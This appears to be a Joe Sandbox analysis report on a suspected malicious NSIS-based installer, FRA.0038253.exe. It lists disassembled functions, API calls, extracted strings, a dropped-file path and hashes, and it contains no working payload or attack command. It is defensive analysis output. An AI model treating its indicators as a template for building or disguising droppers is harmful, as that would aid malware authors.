                                                                          control_flow_graph 384 402f31-402f7f GetTickCount GetModuleFileNameA call 405dea 387 402f81-402f86 384->387 388 402f8b-402fb9 call 406257 call 405c30 call 406257 GetFileSize 384->388 389 403161-403165 387->389 396 4030a4-4030b2 call 402ecd 388->396 397 402fbf 388->397 403 4030b4-4030b7 396->403 404 403107-40310c 396->404 399 402fc4-402fdb 397->399 401 402fdd 399->401 402 402fdf-402fe8 call 403344 399->402 401->402 411 40310e-403116 call 402ecd 402->411 412 402fee-402ff5 402->412 406 4030b9-4030d1 call 40335a call 403344 403->406 407 4030db-403105 GlobalAlloc call 40335a call 403168 403->407 404->389 406->404 435 4030d3-4030d9 406->435 407->404 433 403118-403129 407->433 411->404 413 403071-403075 412->413 414 402ff7-40300b call 405da5 412->414 421 403077-40307e call 402ecd 413->421 422 40307f-403085 413->422 414->422 431 40300d-403014 414->431 421->422 424 403094-40309c 422->424 425 403087-403091 call 406736 422->425 424->399 432 4030a2 424->432 425->424 431->422 437 403016-40301d 431->437 432->396 438 403131-403136 433->438 439 40312b 433->439 435->404 435->407 437->422 440 40301f-403026 437->440 441 403137-40313d 438->441 439->438 440->422 442 403028-40302f 440->442 441->441 443 40313f-40315a SetFilePointer call 405da5 441->443 442->422 444 403031-403051 442->444 447 40315f 443->447 444->404 446 403057-40305b 444->446 448 403063-40306b 446->448 449 40305d-403061 446->449 447->389 448->422 450 40306d-40306f 448->450 449->432 449->448 450->422
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402F42
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FRA.0038253.exe,00000400,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                                                            • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405DEE
                                                                            • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405E10
                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FRA.0038253.exe,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008), ref: 00402FAA
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                                                          Strings
                                                                          • Inst, xrefs: 00403016
                                                                          • "C:\Users\user\Desktop\FRA.0038253.exe", xrefs: 00402F37
                                                                          • C:\Users\user\Desktop\FRA.0038253.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
                                                                          • soft, xrefs: 0040301F
                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                                                          • Null, xrefs: 00403028
                                                                          • Error launching installer, xrefs: 00402F81
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
                                                                          • C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\FRA.0038253.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FRA.0038253.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 2803837635-2155060087
                                                                          • Opcode ID: 9dda8f0c8f86cce6e6972106608d1071ed34c33a473a7669bd73a48644bf60ac
                                                                          • Instruction ID: 4a321ea1c49715b1b47a0bb030cb70b4d922ff216aaa97efe1fb1ba5c0ef36b3
                                                                          • Opcode Fuzzy Hash: 9dda8f0c8f86cce6e6972106608d1071ed34c33a473a7669bd73a48644bf60ac
                                                                          • Instruction Fuzzy Hash: DC51D371A01214ABDB20EFA5DD85B9E7EACEB54366F10403BF900B62D1C77C9E418B9D
                                                                          Function 004062EA Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 208stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 451 4062ea-4062f5 452 4062f7-406306 451->452 453 406308-40631d 451->453 452->453 454 406323-40632e 453->454 455 40652e-406532 453->455 454->455 456 406334-40633b 454->456 457 406340-40634a 455->457 458 406538-406542 455->458 456->455 457->458 459 406350-406357 457->459 460 406544-406548 call 406257 458->460 461 40654d-40654e 458->461 462 406521 459->462 463 40635d-406393 459->463 460->461 467 406523-406529 462->467 468 40652b-40652d 462->468 465 406399-4063a3 463->465 466 4064cb-4064ce 463->466 469 4063c0 465->469 470 4063a5-4063ae 465->470 471 4064d0-4064d3 466->471 472 4064fe-406501 466->472 467->455 468->455 476 4063c7-4063cf 469->476 470->469 475 4063b0-4063b3 470->475 477 4064e3-4064ef call 406257 471->477 478 4064d5-4064e1 call 4061b5 471->478 473 406503-40650a call 4062ea 472->473 474 40650f-40651f lstrlenA 472->474 473->474 474->455 475->469 481 4063b5-4063b8 475->481 482 4063d1 476->482 483 4063d8-4063da 476->483 486 4064f4-4064fa 477->486 478->486 481->469 487 4063ba-4063be 481->487 482->483 488 406411-406414 483->488 489 4063dc-4063f7 call 40613e 483->489 486->474 491 4064fc 486->491 487->476 492 406416-406422 GetSystemDirectoryA 488->492 493 406427-40642a 488->493 494 4063fc-4063ff 489->494 495 4064c3-4064c9 call 406551 491->495 496 4064ad-4064b0 492->496 497 40643b-40643e 493->497 498 40642c-406438 GetWindowsDirectoryA 493->498 499 4064b2-4064b6 494->499 500 406405-40640c call 4062ea 494->500 495->474 496->495 496->499 497->496 502 406440-40645e 497->502 498->497 499->495 504 4064b8-4064be lstrcatA 499->504 500->496 506 406460-406463 502->506 507 406475-406481 call 40667f 502->507 504->495 506->507 510 406465-406469 506->510 513 406489-40648d 507->513 512 406471-406473 510->512 512->496 512->507 514 4064a4-4064ab 513->514 515 40648f-4064a2 SHGetPathFromIDListA CoTaskMemFree 513->515 514->496 514->502 515->496 515->514
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040641C
                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,00000000), ref: 00406432
                                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call,?,004053D3,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000), ref: 00406491
                                                                          • CoTaskMemFree.OLE32(00000000,?,004053D3,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000), ref: 0040649A
                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000), ref: 004064BE
                                                                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004053D3,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,00000000,004178D8,00000000), ref: 00406510
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\7w$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 4024019347-1622798255
                                                                          • Opcode ID: 7a4fcdd4c78e333f76bb816c68d427fff657220326b08f724acd3492f18cc034
                                                                          • Instruction ID: 1c9ec7345ab22f02a0b281331869ecf5a94f5ab101962b25afda0e41a477266e
                                                                          • Opcode Fuzzy Hash: 7a4fcdd4c78e333f76bb816c68d427fff657220326b08f724acd3492f18cc034
                                                                          • Instruction Fuzzy Hash: C5610571A00211AFDB209F24EC85B7A7BA4AB55724F16813FF803B62D1C67D8D61CB5D
                                                                          Function 0040177E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 585 40177e-4017a1 call 402c5e call 405c56 590 4017a3-4017a9 call 406257 585->590 591 4017ab-4017bd call 406257 call 405be9 lstrcatA 585->591 596 4017c2-4017c8 call 406551 590->596 591->596 601 4017cd-4017d1 596->601 602 4017d3-4017dd call 4065ea 601->602 603 401804-401807 601->603 610 4017ef-401801 602->610 611 4017df-4017ed CompareFileTime 602->611 604 401809-40180a call 405dc5 603->604 605 40180f-40182b call 405dea 603->605 604->605 613 4018a3-4018cc call 40539b call 403168 605->613 614 40182d-401830 605->614 610->603 611->610 626 4018d4-4018e0 SetFileTime 613->626 627 4018ce-4018d2 613->627 615 401832-401874 call 406257 * 2 call 4062ea call 406257 call 40596d 614->615 616 401885-40188f call 40539b 614->616 615->601 648 40187a-40187b 615->648 628 401898-40189e 616->628 630 4018e6-4018f1 CloseHandle 626->630 627->626 627->630 631 402af3 628->631 634 4018f7-4018fa 630->634 635 402aea-402aed 630->635 636 402af5-402af9 631->636 638 4018fc-40190d call 4062ea lstrcatA 634->638 639 40190f-401912 call 4062ea 634->639 635->631 645 401917-4023af 638->645 639->645 649 4023b4-4023b9 645->649 650 4023af call 40596d 645->650 648->628 651 40187d-40187e 648->651 649->636 650->649 651->616
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,00000000,00000000,00000031), ref: 004017BD
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,00000000,00000000,00000031), ref: 004017E7
                                                                            • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,00403545,spidsmus,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406264
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                            • Part of subcall function 0040539B: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                            • Part of subcall function 0040539B: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Temp\nspA3DD.tmp$C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll$Call
                                                                          • API String ID: 1941528284-3918142026
                                                                          • Opcode ID: 97f8a186605f93049767f2658230aac1478c04fcb5d232af0e8365a185111461
                                                                          • Instruction ID: d68083d7be573bf7b424bf06ea3a531533a5a02c0da8b97de7743fd59a514b88
                                                                          • Opcode Fuzzy Hash: 97f8a186605f93049767f2658230aac1478c04fcb5d232af0e8365a185111461
                                                                          • Instruction Fuzzy Hash: E241E471A04515BACF20BBB5CC45DAF3669EF41329B20823FF522F10E1D67C8A519AAD
                                                                          Function 0040539B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 652 40539b-4053b0 653 405466-40546a 652->653 654 4053b6-4053c8 652->654 655 4053d3-4053df lstrlenA 654->655 656 4053ca-4053ce call 4062ea 654->656 658 4053e1-4053f1 lstrlenA 655->658 659 4053fc-405400 655->659 656->655 658->653 660 4053f3-4053f7 lstrcatA 658->660 661 405402-405409 SetWindowTextA 659->661 662 40540f-405413 659->662 660->659 661->662 663 405415-405457 SendMessageA * 3 662->663 664 405459-40545b 662->664 663->664 664->653 665 40545d-405460 664->665 665->653
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                          • lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll
                                                                          • API String ID: 2531174081-1519149975
                                                                          • Opcode ID: b7e689ba3568b45e661cc71a8209ba49a94a919dc578635e08100e76a75d270e
                                                                          • Instruction ID: 768db45cab79a8a24b618bf1c75d7959fc692146c09f0b07473e3771a574ba6b
                                                                          • Opcode Fuzzy Hash: b7e689ba3568b45e661cc71a8209ba49a94a919dc578635e08100e76a75d270e
                                                                          • Instruction Fuzzy Hash: E8218E71A00118BBCB11AFA5DD80ADFBFB9EF04354F14807AF944A6291C7798E908F98
                                                                          Function 00406611 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 666 406611-406631 GetSystemDirectoryA 667 406633 666->667 668 406635-406637 666->668 667->668 669 406647-406649 668->669 670 406639-406641 668->670 672 40664a-40667c wsprintfA LoadLibraryExA 669->672 670->669 671 406643-406645 670->671 671->672
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406628
                                                                          • wsprintfA.USER32 ref: 00406661
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406675
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-4240819195
                                                                          • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                                          • Instruction ID: 6072706d14593a5edd0f204686c44205f434de148f4e6431a115c2c8130293b5
                                                                          • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                                          • Instruction Fuzzy Hash: 68F0FC7054020967DF1497A4DD0DFEB365CAB08308F14047AA547E10D1EAB9D4258B59
                                                                          Function 00403168 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 673 403168-40317c 674 403185-40318d 673->674 675 40317e 673->675 676 403194-403199 674->676 677 40318f 674->677 675->674 678 4031a9-4031b6 call 403344 676->678 679 40319b-4031a4 call 40335a 676->679 677->676 683 4032fb 678->683 684 4031bc-4031c0 678->684 679->678 685 4032fd-4032fe 683->685 686 4032e4-4032e6 684->686 687 4031c6-4031e6 GetTickCount call 4067a4 684->687 689 40333d-403341 685->689 690 4032e8-4032eb 686->690 691 40332f-403333 686->691 697 40333a 687->697 699 4031ec-4031f4 687->699 692 4032f0-4032f9 call 403344 690->692 693 4032ed 690->693 694 403300-403306 691->694 695 403335 691->695 692->683 706 403337 692->706 693->692 700 403308 694->700 701 40330b-403319 call 403344 694->701 695->697 697->689 703 4031f6 699->703 704 4031f9-403207 call 403344 699->704 700->701 701->683 710 40331b-403327 call 405e91 701->710 703->704 704->683 711 40320d-403216 704->711 706->697 716 4032e0-4032e2 710->716 717 403329-40332c 710->717 713 40321c-403239 call 4067c4 711->713 719 4032dc-4032de 713->719 720 40323f-403256 GetTickCount 713->720 716->685 717->691 719->685 721 403258-403260 720->721 722 40329b-40329d 720->722 725 403262-403266 721->725 726 403268-403293 MulDiv wsprintfA call 40539b 721->726 723 4032d0-4032d4 722->723 724 40329f-4032a3 722->724 723->699 729 4032da 723->729 727 4032a5-4032aa call 405e91 724->727 728 4032b8-4032be 724->728 725->722 725->726 731 403298 726->731 734 4032af-4032b1 727->734 733 4032c4-4032c8 728->733 729->697 731->722 733->713 735 4032ce 733->735 734->716 736 4032b3-4032b6 734->736 735->697 736->733
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: ... %d%%
                                                                          • API String ID: 551687249-2449383134
                                                                          • Opcode ID: c1757d8d69ce9914fad8efa2c5f470e5bd93be339a0fd742eb9dfc59a3915d89
                                                                          • Instruction ID: 81f605a2bbbb9019fe825c6e2bdb03f78ec8627a391956c637487de55b2f7a76
                                                                          • Opcode Fuzzy Hash: c1757d8d69ce9914fad8efa2c5f470e5bd93be339a0fd742eb9dfc59a3915d89
                                                                          • Instruction Fuzzy Hash: FB516D71900219ABDB10DF66D94469E7FACEB04766F14817FFC40B72D0CB789A41CBA9
                                                                          Function 00402D60 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 737 402d60-402d89 call 4060dd 739 402d8e-402d92 737->739 740 402e43-402e47 739->740 741 402d98-402d9c 739->741 742 402dc1-402dd4 741->742 743 402d9e-402dbf RegEnumValueA 741->743 745 402dfd-402e04 RegEnumKeyA 742->745 743->742 744 402e28-402e36 RegCloseKey 743->744 744->740 746 402dd6-402dd8 745->746 747 402e06-402e18 RegCloseKey call 40667f 745->747 746->744 748 402dda-402dee call 402d60 746->748 753 402e38-402e3e 747->753 754 402e1a-402e26 RegDeleteKeyA 747->754 748->747 755 402df0-402dfc 748->755 753->740 754->740 755->745
                                                                          APIs
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
